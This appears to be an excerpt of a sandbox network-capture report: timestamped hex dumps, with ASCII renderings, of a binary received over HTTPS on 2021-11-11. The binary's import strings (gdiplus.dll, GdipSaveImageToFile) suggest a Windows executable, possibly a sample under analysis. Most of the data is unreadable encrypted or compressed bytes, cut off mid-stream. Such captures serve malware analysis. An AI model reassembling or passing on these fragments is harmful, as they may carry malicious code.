                                                                                                                                                                                2021-11-11 11:26:04 UTC97INData Raw: 69 70 6c 75 73 2e 64 6c 6c 00 00 00 47 64 69 70 53 61 76 65 49 6d 61 67 65 54 6f 46 69 6c 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 74 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 20 80 03 00 7c 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 33 80 03 00 84 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 56 80 03 00 8c 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 76 80 03 00 94 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 92 80 03 00 9c 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 b1 80 03 00 a4 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 80 03 00 00 00 00 00 2b 80 03 00 00 00 00 00 3d 80 03 00 00 00 00 00 63 80 03 00 00 00 00 00 82 80 03 00 00 00 00 00 9e 80 03 00 00 00 00 00 bd 80 03 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                Data Ascii: iplus.dllGdipSaveImageToFilet |3Vv+=c
                                                                                                                                                                                2021-11-11 11:26:04 UTC100INData Raw: 89 f1 99 c8 cf 23 60 49 da 84 ef 1c 44 89 c7 e7 80 17 21 df 83 99 f7 93 e8 f1 e7 01 33 c4 c0 e6 e9 59 65 1e e1 d4 99 de 63 19 0a cc 6a 08 15 b6 4c 1a 0c d1 7a 1f ba 20 fc 03 30 92 fd 15 83 98 1b e0 6c 03 da cc f8 cf 62 16 e0 f7 bd 18 c3 22 0c 47 17 84 b2 9c 88 14 f2 4a 8d 5b ff 91 a2 14 03 0a 11 c5 21 08 09 13 0b b1 af 12 08 01 4f 08 3d 24 38 8c c9 02 12 5d 65 0a 11 94 1a 03 07 c8 d9 78 9e 01 e7 94 8b 05 21 32 92 bf 42 08 0e 67 81 8a 19 80 fb 7a 61 09 07 65 40 1a ee 6d 25 a2 30 02 0d 66 29 af 31 75 72 63 b4 09 66 e7 e2 80 03 a9 7a 2f ec a0 2d e7 8d 01 e9 98 6b 70 8b f5 93 07 09 84 48 24 8c e3 88 89 12 e7 8a 21 94 4a e4 23 0a 28 bd 9c 86 58 f2 8b a4 e3 8a 35 6c ff ee 10 9e 84 50 16 ff 00 e1 4f 65 56 6e e9 79 5b f7 c3 a9 32 d3 b4 0a 34 e2 e8 dc 21 9a 0e 26
                                                                                                                                                                                Data Ascii: #`ID!3YecjLz 0lb"GJ[!O=$8]ex!2Bgzae@m%0f)1urcfz/-kpH$!J#(X5lPOeVny[24!&
                                                                                                                                                                                2021-11-11 11:26:04 UTC104INData Raw: 26 87 51 a4 f8 34 40 d3 91 87 ae 7f 7c 00 19 3f 06 d9 31 33 7a eb 03 bb 3c 45 37 f3 1a ff 74 6c b1 7d f9 da 70 45 6d 00 2f ae 6e 5a df d2 a7 9a 1f d4 8e 78 9d 49 8e 97 8f 80 02 d9 e9 1c da c0 08 c5 b8 28 b7 5e 1e eb 68 59 07 83 13 84 f0 dc d6 d4 29 01 54 bd 6e 0f c1 61 fc d4 8e bc a0 d8 38 22 00 f4 89 f8 13 60 42 bf 50 00 86 a7 a1 12 f3 1b a5 b7 00 76 4a 56 2b 96 d7 77 85 00 ce fc 7e 48 9e 5b bb 03 00 8a a9 f4 be 4e ff 7c 17 00 e6 2c b1 a4 43 38 15 de 58 fa 6f 00 df e8 37 5c 18 09 ea 00 53 2f 52 2d 5b f2 36 fe 0e 0f df e5 70 00 d9 23 5d 3a 24 00 90 15 72 a1 a8 31 f4 41 00 ea f8 b8 0e 6c fb 69 59 00 77 ed 06 a2 81 08 68 ae 00 76 33 90 d7 21 5e 3d ba 0e b3 89 7d 1e 20 69 d8 19 91 65 00 70 56 72 fe e5 33 d2 79 00 ae cb b3 30 02 b0 35 12 00 bf b9 39 a2 7f 64
                                                                                                                                                                                Data Ascii: &Q4@|?13z<E7tl}pEm/nZxI(^hY)Tna8"`BPvJV+w~H[N|,C8Xo7\S/R-[6p#]:$r1AliYwhv3!^=} iepVr3y059d
                                                                                                                                                                                2021-11-11 11:26:04 UTC108INData Raw: 88 bd 09 9d ef 7a 8e 02 f0 67 65 41 ea 09 fc b2 1f 00 fe 62 69 7f b4 ec be cb 26 3c 04 70 d0 23 94 43 02 00 cf 13 45 3a c5 04 84 03 6a 76 d1 0f 85 e3 8c 01 e9 54 f8 1d 38 cd 16 46 dc b8 7e 18 d5 fc 16 1e 92 98 0e 13 ae ad 97 44 50 71 e6 13 13 34 1c 5d d3 74 05 5e ea fd e8 ec 00 a4 cf 36 9c b3 93 e2 0b f4 88 b7 fa 80 ed c4 1f 7c 57 03 8f c1 39 31 49 ea c2 9a 60 44 cc 94 cb f8 fa d0 94 03 d8 71 21 e7 0f 19 1d 20 c4 c8 78 14 55 e6 94 01 9a 29 52 f5 c1 db be 20 28 75 a8 28 bf ac b0 26 67 f0 4c c0 0d d1 9e 33 c9 c4 9f a0 4c 42 e8 f9 c5 30 5e 35 18 31 98 2f e0 2e 0e 06 fa b7 07 1d 40 33 7e 9a e3 c3 e9 ea 78 b2 d2 28 0e 5f b6 9f 40 ed 9b b3 2f 54 27 d9 6c 64 15 a3 27 27 3b d0 c3 b5 94 9f 45 33 eb fc fa 29 ec 38 61 88 22 83 23 1f 39 18 7e 40 52 e9 3e 88 09 bc 35
                                                                                                                                                                                Data Ascii: zgeAbi&<p#CE:jvT8F~DPq4]t^6|W91I`Dq! xU)R (u(&gL3LB0^51/.@3~x(_@/T'ld'';E3)8a"#9~@R>5
                                                                                                                                                                                2021-11-11 11:26:04 UTC112INData Raw: e4 37 0a 65 df 3d 80 c8 9f 90 91 04 1c 99 2a d2 e5 80 c9 24 9a 3a 00 e4 27 c8 8b fe 2e 6a c2 78 1e b8 ec 65 0d 3d 1b 03 62 6c 60 26 19 0a 37 ac 1f e3 d2 82 50 99 0e 7d e5 8e 49 d7 0b 6a dc 53 e7 03 ab f4 86 72 6e 45 4e 09 bc 6c a4 ab 3d 21 ec 0f 86 44 05 35 e2 8d 2f c7 45 d3 31 82 66 29 07 b9 67 9a 49 04 7f 0f dc 3b 2b 58 08 35 a5 84 45 31 13 01 08 7b cb b4 07 6a f5 84 6d e5 ef fe 61 c4 31 0f 3f f3 1f 41 0d 7b dc 91 09 80 f1 83 61 e6 10 3f 01 e9 84 14 f7 38 93 ff 96 a3 cc e6 0f 2f b2 ab 79 b2 45 16 bf 24 90 89 cc 37 b9 58 19 f7 98 52 f7 94 99 b1 b1 6a 3b 17 38 e9 c1 f7 84 02 fe 8f 40 25 27 58 fc 95 0e e7 0e 4e 03 b0 d9 4a 62 0d 20 da 44 e3 bc d6 29 6e 5b 2d 55 1c 7c df 21 b0 39 ad df 27 ab 22 0c 1c 31 29 21 25 02 03 84 cf dd 01 19 38 90 26 9f 81 17 dc 29
                                                                                                                                                                                Data Ascii: 7e=*$:'.jxe=bl`&7P}IjSrnENl=!D5/E1f)gI;+X5E1{jma1?A{a?8/yE$7XRj;8@%'XNJb D)n[-U|!9'"1)!%8&)
                                                                                                                                                                                2021-11-11 11:26:04 UTC116INData Raw: 95 2b af 35 51 17 89 21 f8 5e 1c cb 46 e9 17 cf 03 0e 28 ee 01 4b 0f 8c 8a 21 5b ca ac 77 d0 a3 a4 fe 37 3b c1 0f 91 51 cc 23 01 b8 fc 89 5b eb 3a 98 bc cb 44 1c 29 17 d0 21 c0 ae 32 e4 35 e6 52 58 f8 d6 dd 6d 91 a0 0e 3b 16 2e d9 c0 e1 df f2 44 2b 95 f1 ff c3 21 f6 02 c8 b8 61 40 cc 22 40 1c 31 c3 d6 04 ec cb d0 5c 96 e9 23 82 d3 b9 0a 74 13 52 75 09 55 e2 16 71 69 a5 5c 6e ec fb c1 bf 50 f2 7c 07 ec 40 e1 3b 64 a1 44 05 21 d7 bc be c1 01 ff 66 50 6a f6 96 4e 88 50 09 28 f6 b8 1f ee fe 97 4c d0 27 f7 80 53 3b af 22 76 ee 40 59 53 49 42 4b 04 9d df d4 d5 84 dd fa 76 1d 50 b5 65 63 22 15 9d 62 90 dd 09 82 c5 bd 1b e8 3e ff e4 02 a2 26 93 fd 2f 89 c6 e6 64 b0 13 7b b0 5c 29 17 64 a6 ea 8d 9b 31 25 ed ff 6a f7 08 25 26 71 92 62 d6 08 dd 89 97 79 33 6f 4b c7
                                                                                                                                                                                Data Ascii: +5Q!^F(K![w7;Q#[:D)!25RXm;.D+!a@"@1\#tRuUqi\nP|@;dD!fPjNP(L'S;"v@YSIBKvPec"b>&/d{\)d1%j%&qby3oK
                                                                                                                                                                                2021-11-11 11:26:04 UTC120INData Raw: 43 f8 00 63 65 a2 c1 8a 28 97 81 00 74 05 e4 77 39 60 cb 1f 00 10 b8 a9 b1 f4 6d 8c 9b a0 d4 b6 0a 00 cd 7f 32 43 6c 75 61 b0 04 41 24 95 1c f1 c0 7f ca 1a dd 01 57 cf 97 b7 7a 29 fe c4 a4 85 04 5e 56 15 fa 4c bb 0e c2 ba 12 a8 71 a4 a8 a5 2f d9 7c c2 59 22 3b 39 cd 7a 89 67 68 17 84 39 31 ff 2d 74 c2 38 eb ff 72 32 1c 33 8f 02 97 03 bf 30 f4 f7 21 fb d2 94 e1 34 7e 29 7a 7e 98 9d d6 d7 9c 85 f2 f9 07 d2 e9 48 84 fe b8 e2 6d 39 b6 12 0d 80 f2 2d 84 f3 04 bc c8 d0 0d 14 25 28 9f b5 17 85 a7 8c 41 46 d3 d9 89 eb 2f 30 d4 21 d0 31 5e f0 f3 6e 65 44 0d 1a 21 32 75 09 78 f1 90 48 3c a7 7b e4 27 44 d9 2f 21 0b 76 ea e4 f2 e8 1f e2 c7 10 29 ce 95 cc d1 05 07 01 7a 3c 0e aa ca 89 27 87 ce 99 2f 31 fa 60 9f ee 28 95 c5 f9 35 3a a8 3a 4a dd 9d 11 2f 31 0f 24 46 d6
                                                                                                                                                                                Data Ascii: Cce(tw9`m2CluaA$Wz)^VLq/|Y";9zgh91-t8r230!4~)z~Hm9-%(AF/0!1^neD!2uxH<{'D/!v)z<'/1`(5::J/1$F
                                                                                                                                                                                2021-11-11 11:26:04 UTC125INData Raw: c9 2f 71 c5 a2 88 f7 28 a7 d6 a1 44 e7 25 d9 56 61 0f 28 7c a4 fa a6 0d 2d 02 d4 ff 17 0a e2 27 96 64 94 8a 4f 74 4a 02 ff 35 86 f5 9b 7f 99 a2 2b 74 60 f1 3d 1d 57 28 f3 8b 2b b2 64 b3 c2 14 4c 29 ff 44 8b 09 f4 80 22 2c 5b 01 b6 7b 4d 37 2b d7 d0 93 e9 8d 7a 0c cb d1 9d 00 2c 0a 7b 52 91 3d 0c 29 53 5b 42 8a 12 31 c7 fa 61 52 21 c2 7b f6 e1 48 a3 d7 e4 92 5e b5 6c 33 bf c4 dc 04 35 b4 c1 a8 5c fb 83 2a c6 a2 ee d5 9e 16 b0 10 72 89 99 5e a7 d6 fc 20 99 95 54 72 50 21 d6 a2 28 09 d5 54 17 52 f8 c5 f5 77 c1 12 36 b8 b3 63 30 66 26 6d 51 bb 09 5f 96 61 30 fc ff c8 8b a6 e2 27 90 b3 66 f7 16 16 31 c8 ab 65 c9 eb 74 46 b8 48 80 31 1f bf 91 5c 27 98 0a b0 a9 29 38 24 31 f6 5c ae f7 e7 b1 eb 40 f4 df bf e1 2e 29 7e 3e 09 28 f7 c6 e7 58 20 d8 3d f1 2f cb ce 24
                                                                                                                                                                                Data Ascii: /q(D%Va(|-'dOtJ5+t`=W(+dL)D",[{M7+z,{R=)S[B1aR!{H^l35\*r^ TrP!(TRw6c0f&mQ_a0'f1etFH1\')8$1\@.)~>(X =/$
                                                                                                                                                                                2021-11-11 11:26:04 UTC129INData Raw: 16 e9 1f dd c7 3c d6 8b 07 59 96 40 27 14 36 73 69 3e d2 de 6e cb 0b 53 c5 eb af e6 f1 97 50 53 71 0f 29 86 08 d9 62 21 cb 43 45 a2 d9 f1 70 69 99 f8 e3 76 1f 65 ac ea c5 0b cd 2a 7f 12 b5 49 b8 87 b9 cf cf 66 76 5b cd ca 6e 87 5d f9 c5 e9 30 48 03 43 be 12 2a 89 df aa 8b 39 4f 82 72 d0 54 52 c5 c7 f2 fd 7c 2d 89 f1 b2 b3 09 32 fc 21 48 95 27 e5 64 10 28 2f 3d 94 94 5b ba 28 e0 21 5f ce a9 d0 f4 b8 85 d2 09 5e 13 d9 78 93 31 ef 74 64 84 33 ee 0b f0 04 79 1b 69 ff 18 ad 09 d3 b5 cc 2b 5a e8 b1 11 31 7b 62 c8 90 d8 4a ae 67 af f4 0f a9 fa 9c 2f 71 9c 22 90 5a 53 29 52 3f 3d 93 6f 67 b3 6b 5d 31 1d fb 79 06 8b ce 7d 30 e4 08 01 5a fb e5 66 f6 54 8c e8 b8 01 5a 89 11 e9 1b c2 7c a5 e9 5e 1c 13 ef 8a 8c 12 5a bb bb cc 28 cf 5a 1c 2d e6 ee 29 7e 49 25 3a 09 d7
                                                                                                                                                                                Data Ascii: <Y@'6si>nSPSq)b!CEpive*Ifv[n]0HC*9OrTR|-2!H'd(/=[(!_^x1td3yi+Z1{bJg/q"ZS)R?=ogk]1y}0ZfTZ|^Z(Z-)~I%:
                                                                                                                                                                                2021-11-11 11:26:04 UTC132INData Raw: da bd 72 85 ca 40 b3 18 3c c7 4a b2 d0 91 36 25 29 63 5f 9c be 39 7c 6a c0 db da 01 c3 be f5 62 8b 03 59 03 b1 6e 21 fa 2c 07 de 17 c6 22 ad 08 57 14 84 9e ad 49 7d 92 0f d5 89 d3 5b f4 40 e0 b3 d5 3b 03 68 f7 27 93 12 66 e7 40 74 7c af 31 05 0d b1 3d 86 24 00 34 02 57 c6 58 44 1c 68 94 6c 80 18 16 25 f4 5a 20 72 7b e0 ab 6b 7c f8 07 86 7f c5 97 00 8d e7 48 5e d8 e5 12 b7 60 1d ba 93 ec 5b 81 fa 2b 83 66 98 c0 9e 57 0c 3c 52 e7 43 24 bd 70 23 30 f7 0d 34 89 82 1d e0 8e 00 1e ba 1f cc e6 69 2f 1b 9f 5a a0 00 7d cb 56 47 ca 25 45 8b 09 17 23 53 0e 19 2b 2b 7f f2 38 14 ac 30 a9 1b ea 29 78 18 74 d0 e4 1c 8a 04 29 39 e9 80 1e 88 1e 31 07 97 47 0f 0f a3 0b 78 1a 10 0a bb bd 06 28 d7 4f 19 68 31 41 a5 38 74 e6 97 bc bb 03 5e db 64 80 0e 20 de c8 1e 05 78 57 03
                                                                                                                                                                                Data Ascii: r@<J6%)c_9|jbYn!,"WI}[@;h'f@t|1=$4WXDhl%Z r{k|H^`[+fW<RC$p#04i/Z}VG%E#S++80)xt)91Gx(Oh1A8t^d xW
                                                                                                                                                                                2021-11-11 11:26:04 UTC136INData Raw: 04 60 fe 24 38 6b 7f b9 0b ae 69 ce 56 fa 22 20 0b 31 07 ac 1d 6f c6 43 00 c0 dc b7 4f f4 fd 06 cc 76 f9 3b 08 7a c2 1e 20 e6 23 43 1b e7 ba 48 0d 6a 84 48 41 49 d0 a4 42 9e e9 44 cb 3f 8d ad fa de 10 ca ee b3 e2 02 c6 45 fc 02 76 6a 4c 12 fd 79 fe 37 eb 15 c4 e1 62 e7 12 88 0a 38 4c 28 15 95 4e a2 2d 09 c9 6a ae 0b f2 5d 14 b8 58 29 e2 39 d3 26 cb 9d be b1 d9 4c 09 fb 6e 98 c3 d1 b5 e6 13 f9 9e 2c f9 96 f7 f6 2d 2d c1 d6 d8 73 e0 21 f7 be 9d 73 3a 2d 78 4d 94 52 e2 29 17 e9 c1 c3 7a 99 45 6f 20 c4 01 d6 21 4f f1 a2 20 93 57 58 fb 8b f4 25 74 ff 92 81 55 cc 96 4c db 64 04 a5 01 6f 1d ea 8d 78 fa 85 92 ef 12 a9 b9 77 db ab da ee ff 96 7d 9e 94 e9 79 29 84 0f b6 07 af 9a 10 5a af 37 7a 24 de ee 31 cf 21 cb 59 9a f8 e9 80 96 f2 ef eb 07 5e 11 69 dc b0 2d 73
                                                                                                                                                                                Data Ascii: `$8kiV" 1oCOv;z #CHjHAIBD?EvjLy7b8L(N-j]X)9&Ln,--s!s:-xMR)zEo !O WX%tULdoxw}y)Z7z$1!Y^i-s
                                                                                                                                                                                2021-11-11 11:26:04 UTC140INData Raw: f9 ac b5 bc 8a 26 05 09 df 2b 08 92 f1 db 89 c6 cc 18 59 de ee 27 f6 f8 63 97 94 f2 95 fe f8 c2 09 d0 92 22 5d 53 5e 2d 9a 2a d6 83 c4 1c 56 fb 09 32 f6 75 67 5e ad 04 42 f3 ff 8b 07 4f 53 74 fe 3d 76 6e bc 09 e4 cd f6 23 3e 09 ce 29 fa 5f 4c d1 25 ea 24 94 ff 42 c6 16 29 d2 64 2c fe 52 7a 13 11 f2 4d 93 f8 64 c5 33 1a bb 4a ee 80 d7 52 31 ef 29 75 fb 2e dd 0c 6a 35 ee 98 fb 08 09 d4 2c 98 4d 5d e6 d0 2c f6 1c e3 58 e8 ba 97 e5 ae 8b 05 26 e4 85 9d d2 f6 4e 49 fc 1b d2 a8 83 04 f3 3e a0 03 ea 0b 16 1c 73 7e 2d d5 14 30 27 31 df f4 3c c0 29 1a b9 c0 16 18 f6 22 fb 73 a6 08 ca ea 7d 45 d7 29 29 ad c3 f8 5a 52 8a 44 5a c5 91 ca 67 5e ec 28 e4 e1 15 6a 1c 02 84 09 d6 21 bf 12 33 65 20 b9 ec 5b 8b 77 58 a1 42 54 4a f7 c2 62 17 88 ca 75 32 e0 54 c4 69 df 15 3f
                                                                                                                                                                                Data Ascii: &+Y'c"]S^-*V2ug^BOSt=vn#>)_L%$B)d,RzMd3JR1)u.j5,M],X&NI>s~-0'1<)"s}E))ZRDZg^(j!3e [wXBTJbu2Ti?
                                                                                                                                                                                2021-11-11 11:26:04 UTC144INData Raw: b3 cd 0f f3 03 39 c9 f0 73 1b a4 75 62 09 fa f7 c2 f2 fd 42 51 d1 c2 49 a4 63 ee ae 2c 0b c1 4e 20 ca 5e 01 89 d6 21 38 09 d1 2b 34 26 ba 19 c6 4e e6 2f ea 28 6c c1 9d c6 00 25 05 3b 94 2b b7 46 d8 e8 4d 12 7f 52 13 05 88 89 fa 99 f7 2b f2 71 8b f1 5f 4e 30 a1 39 66 6b a0 63 e8 9d e5 d0 1f 2f c7 b9 a6 74 e5 eb ab b6 a1 4a c5 ab e9 25 d2 18 08 07 09 66 1d 35 4e 9e 33 38 7d 9c be f8 e9 96 0f d2 08 33 8a 23 c9 31 d5 12 ff cc 64 95 89 29 f3 f0 a6 59 62 b0 54 42 55 29 bf db 14 a7 ca 65 77 ed e8 27 64 00 25 08 06 0b c3 57 65 bd 2d fe 5e 27 dc df e9 ee 81 c4 ea 21 d8 f3 2f 5b c4 c8 b7 49 4d a3 82 89 fb 35 d4 6a 68 7a 21 0b 25 66 bb 4e 1f dc 51 29 51 db ac 78 5c de bb 5a ff 31 a4 21 f0 7f a8 99 c7 fe 0d 05 04 ca 23 4b 85 91 ef 34 13 84 ed fe 16 51 74 dd 8a b0 13
                                                                                                                                                                                Data Ascii: 9subBQIc,N ^!8+4&N/(l%;+FMR+q_N09fkc/tJ%f5N38}3#1d)YbTBU)ew'd%We-^'!/[IM5jhz!%fNQ)Qx\Z1!#K4Qt
                                                                                                                                                                                2021-11-11 11:26:04 UTC148INData Raw: d8 3a 55 12 cd 68 74 eb 62 6d f2 5c f6 ef 4b 0b 6c 2b 78 d2 4e e1 bc 56 b5 b0 7f 09 5f f7 98 99 c8 2c 8b 08 18 c9 09 92 5e ef 12 c6 af 28 0b f2 b1 36 96 d3 74 bb fa 25 ff ab c3 ab 36 d6 f4 b1 eb 69 6c f9 27 e3 1c 94 16 97 fc 3a 49 7e 9c 2c 46 e9 51 7a 27 59 1e 4d 1c 7f e9 b9 e4 ea a9 45 d6 a0 82 e9 b5 af 70 31 0f 31 ce 9c eb 07 f9 c0 40 e1 74 de 1a 4a 69 fd 7b 84 21 07 a2 d7 d6 f8 c1 d6 a0 08 5e b7 f4 ce f2 d4 ec 2f f3 bb 92 10 ef f3 4a 84 c7 28 b3 1a 92 12 4e bd 3c d3 f3 48 5b e1 b0 08 09 01 5a d2 a6 1b 40 bb db ac 83 95 f4 e6 ad 10 c9 31 da f4 fa 95 f3 a9 16 cb 72 0d 02 82 20 21 f9 94 af b5 7c f3 5a 05 35 20 e2 90 c5 e9 1f ca fd 7b 04 07 4a 95 be 0d ef 99 05 38 5c 15 cb 80 39 cb c1 f9 78 b8 df e6 43 27 ee 74 c8 64 cb bf e2 55 c9 c1 f5 e6 48 97 5f 96 bb
                                                                                                                                                                                Data Ascii: :Uhtbm\Kl+xNV_,^(6t%6il':I~,FQz'YMEp11@tJi{!^/J(N<H[Z@1r !|Z5 {J8\9xC'tdUH_
                                                                                                                                                                                2021-11-11 11:26:04 UTC152INData Raw: be 67 b5 74 c0 7a df 53 7f 82 04 9f 3b 46 f1 90 40 22 d1 6c 53 b5 c5 f0 a5 4c 89 7f 29 4e bf ce 4b 4b ab 78 31 ce 5b 24 99 3d 8b 32 f6 01 f1 86 64 c6 f3 e8 17 ee bb e6 56 11 c6 b8 12 33 16 ef 74 f0 ff e2 63 d3 f8 65 b4 fa d8 f6 09 4a f7 ab cf cf 44 2a 03 0c cd 7b ff 6d 36 31 d2 c6 a0 09 26 95 65 4a 27 d1 fd a7 54 c2 12 b1 a9 8d 80 ea cb e5 20 75 bd 79 2f 89 21 d6 55 b8 1b 09 c6 00 01 ff 66 29 11 bb b9 65 e6 6a 91 03 4f eb 1e b2 1f d5 eb fc e2 d7 d3 8c 3e 4e bd da 9a 11 7e 5a eb 75 b2 dc f5 79 da 97 36 16 68 b4 08 da 17 22 de 5a c0 42 f7 01 ee b4 e4 67 31 6b df 46 1f 13 36 89 f0 ef 39 14 7e c4 c1 ba f2 f5 96 62 e9 80 5e 57 c9 66 f5 9d f8 fe bd 7c 2a 52 d5 8a ee ad e4 08 45 31 c2 eb a7 55 58 4f 82 3e 09 db 59 13 a5 dd 0b 06 fd aa 25 53 09 21 fe b0 c6 f6 80
                                                                                                                                                                                Data Ascii: gtzS;F@"lSL)NKKx1[$=2dV3tceJD*{m61&eJ'T uy/!Uf)ejO>N~Zuy6h"ZBg1kF69~b^Wf|*RE1UXO>Y%S!
                                                                                                                                                                                2021-11-11 11:26:04 UTC157INData Raw: 8b 7e 46 72 2c fe 0b 51 bf 4b a7 3a 63 0c b0 a1 48 c6 5d 5e fb 63 48 26 1a 31 01 d7 06 c1 2b 31 2e bf 74 34 b8 05 d7 c4 58 61 8f ce 80 08 f7 95 7c 36 52 7d 53 b5 38 a7 f7 f3 56 2d 51 c6 a5 d2 b8 9f d4 c8 70 31 c8 5b 21 b1 69 3f 67 78 a9 df 98 6d 2d 1c ac b5 94 9f 16 ee fa cb 73 2f c2 f3 63 12 f6 32 b9 1a d5 d3 54 22 1c 0f eb f5 7f c3 37 64 a2 aa e1 86 3f f3 67 96 f9 45 d3 e2 67 13 2d 1f cf ca 4b bf 2d b6 7f 52 31 bd 94 4e ac 3f a4 d8 44 ea aa 63 dd e5 73 a7 5e 0a 6b f2 6f bd 45 fa 0f 29 c2 49 0f 98 55 09 c0 95 45 47 69 f5 44 0c 13 6e 9b 0f eb a3 48 c4 d1 7b 03 1d b3 06 14 15 8e 7c 28 e0 8d 05 1e 86 70 8b 66 5b d4 50 18 07 9c 83 32 5a 27 00 b2 63 81 2e 0c 9f f5 6f 6d 2c 4a e0 5e 48 0f 6f 0f ed 78 4e 39 14 1d e4 7b 28 00 13 9f 31 7d 30 9d c3 42 a0 da a6 23
                                                                                                                                                                                Data Ascii: ~Fr,QK:cH]^cH&1+1.t4Xa|6R}S8V-Qp1[!i?gxm-s/c2T"7d?gEg-K-R1N?Dcs^koE)IUEGiDnH{|(pf[P2Z'c.om,J^HoxN9{(1}0B#
                                                                                                                                                                                2021-11-11 11:26:04 UTC161INData Raw: 71 ef 42 e6 04 a1 52 1b 09 d6 3e 72 3e 02 76 10 64 1f b2 1c 82 01 eb 31 55 f9 d3 ad 77 09 0c c2 f2 56 3a 53 f2 f9 4c c0 29 88 cb ce 2f 54 bc d0 80 e3 5c 1f 15 4a 8d 96 2e a2 8d 30 13 13 d3 28 e9 b5 79 3b c2 e6 24 45 45 22 b1 21 f6 20 49 b0 0c 29 fe bf 0e f8 92 be 72 c2 1a b3 a7 ea de 84 8b 29 53 ea 34 1d 83 79 31 d6 46 9f 70 95 e7 7b 65 21 32 4a f9 f7 78 50 b5 53 32 2d 7e 76 59 e7 09 a7 30 09 2f f1 b7 c7 ba 09 71 0e 4b fd a9 0b f9 9d 89 c1 03 1b 10 f4 92 7d fa 5d ec 69 5a f2 cb 39 4b fa 32 a7 24 51 ca 43 33 0e 05 64 44 18 a7 66 fe dc 62 c2 bc 49 72 fd 71 2d 12 f2 fe 31 ed 09 c7 2f e1 e8 44 26 b2 d1 85 89 d2 a0 d6 e7 e9 7b 2c 60 ea a6 88 4b 18 ee 64 23 17 98 aa 8b 12 2a f7 1c 13 09 31 da a6 d3 5b 8d a6 2a e8 cb 2c ea c8 72 5d d6 42 28 10 5e b8 29 a3 61 ca
                                                                                                                                                                                Data Ascii: qBR>r>vd1UwV:SL)/T\J.0(y;$EE"! I)r)S4y1Fp{e!2JxPS2-~vY0/qK}]iZ9K2$QC3dDfbIrq-1/D&{,`Kd#*1[*,r]B(^)a
                                                                                                                                                                                2021-11-11 11:26:04 UTC164INData Raw: 10 4e 63 5b e9 fa 3c ea 17 1c ff e3 be 25 59 7f 6b f5 b1 50 f7 2a 8a 83 38 cf 21 08 09 01 d7 d5 98 f9 21 c7 95 42 74 54 92 c4 ef 25 ab e5 ca 3c 89 b7 25 09 af 62 86 c2 da e3 17 31 c8 9c bb 40 a3 e9 6d 8e 3c 71 d6 6a eb 2d 81 2b ab 28 e4 ba a4 10 95 45 f6 af 79 64 aa 22 9f 5f 94 d1 7d c7 e5 2a bc 0a a5 bf f6 b3 41 26 02 a4 e7 59 ad 6b 54 10 2f d7 1a 21 c9 6f f7 3a 31 68 29 cf 39 b6 2b 07 6d 2d dc 5e eb 4a e7 df d9 97 62 31 c7 75 98 ed 2b 33 a6 69 2b ef 28 32 27 5e 05 9c df 95 ff 27 48 7b 41 fd 3e 32 1e 58 49 ed eb d2 93 16 5a 76 2d 5d 14 89 64 54 f3 d8 2d 01 55 b0 eb cf 80 b4 61 6b f7 46 82 82 c5 c5 ad a1 73 92 2a 34 23 34 b5 ab bc 5e e4 ba 12 43 b2 86 96 89 c6 40 52 66 29 37 96 54 79 11 6c e3 da 54 f7 f1 8b 49 50 53 2c ca 40 59 5a 57 c6 36 4a 3f ab cb bb
                                                                                                                                                                                Data Ascii: Nc[<%YkP*8!!BtT%<%b1@m<qj-+(Eyd"_}*A&YkT/!o:1h)9+m-^Jb1u+3i+(2'^'H{A>2XIZv-]dT-UakFs*4#4^C@Rf)7TylTIPS,@YZW6J?
                                                                                                                                                                                2021-11-11 11:26:04 UTC168INData Raw: 0e 4f 6d 1b 5f 3d fa 38 42 8c 97 b0 f9 eb b1 17 a2 90 54 fe 8a 43 2b 1a 0b 28 75 be ea 8b c1 79 f9 06 b0 2a f1 03 22 26 85 33 2c 09 38 0a 55 fa c7 95 f4 97 7a 5c e8 2d de f0 f2 fd d1 13 c9 dd 89 18 d6 1c 69 51 d6 0a b2 09 85 50 28 17 d7 c6 ee 8e 5f 4f b3 e1 2c 62 1d cd e6 0a c4 14 03 1e a3 04 ba 84 e0 6b ae ed ff 84 01 1f af b2 ba 82 d9 8b 19 ff d3 c1 cf 0a 0f 80 50 01 0a 5c ff fc 09 fe b1 b7 5f cc f9 24 08 0e 3e 53 4b ec a4 e2 62 b5 94 49 d3 fc 51 c5 60 86 03 37 2a 09 d7 e2 19 40 3a aa 75 65 8a 85 f3 8b 3b fb b7 73 ca 1e 6d e4 1a 80 ef 31 b9 85 00 3c d6 05 4b 50 3a de c2 16 73 02 ea 00 06 63 54 ab 47 52 00 c4 8d 23 38 e5 a0 b3 59 58 2d 99 28 8c e2 ea 21 38 05 39 38 4e 0e af 12 19 00 27 83 1e ec ab 76 3b e0 c6 38 c8 17 01 9a 35 a4 53 e2 0b 3f 40 0c b4 09
                                                                                                                                                                                Data Ascii: Om_=8BTC+(uy*"&3,8Uz\-iQP(_O,bkP\_$>SKbIQ`7*@:ue;sm1<KP:scTGR#8YX-(!898N'v;85S?@
                                                                                                                                                                                2021-11-11 11:26:04 UTC172INData Raw: 23 8f 18 a9 f7 fd c5 28 25 7f 61 7b c6 7e 9a de 27 e1 7d bc 19 b7 e2 32 57 39 30 03 ea 64 7d 45 94 ea 5f 76 e9 e4 01 0f e9 48 c1 60 29 a0 a5 8d 50 3e 0e 67 8a 77 84 97 70 ae 60 f0 f7 7e 9d 24 52 67 8e b8 c5 30 73 38 bf e5 c1 25 51 d8 eb fc c1 2f 54 99 e4 10 be f9 22 85 03 11 32 13 21 0d 12 10 63 28 46 dd 25 b7 0f 77 6c 53 4c 66 da 4a fb d9 7c 28 d3 c5 37 6a 35 66 ea f4 89 02 41 1f 28 e3 92 13 3c af 98 8d 14 bf 16 8c 90 32 93 29 48 19 6e 13 29 29 7b 8a 23 3f b3 ca f2 3d 8b 1f d7 16 16 d1 64 f3 84 05 62 99 dc a5 76 77 47 40 02 7f d0 32 14 5f 7c 3b 5c 15 c8 8b 08 f7 a2 04 2f 09 06 5f d1 96 c2 d4 fb 59 3f 3d 03 55 bc e3 a9 03 80 88 b7 30 0e 91 08 ef 98 01 f2 bd 71 4e 04 ba 8f 4d c2 54 14 59 9f 1e 89 58 d7 07 c1 9e 06 70 0d 70 ae 00 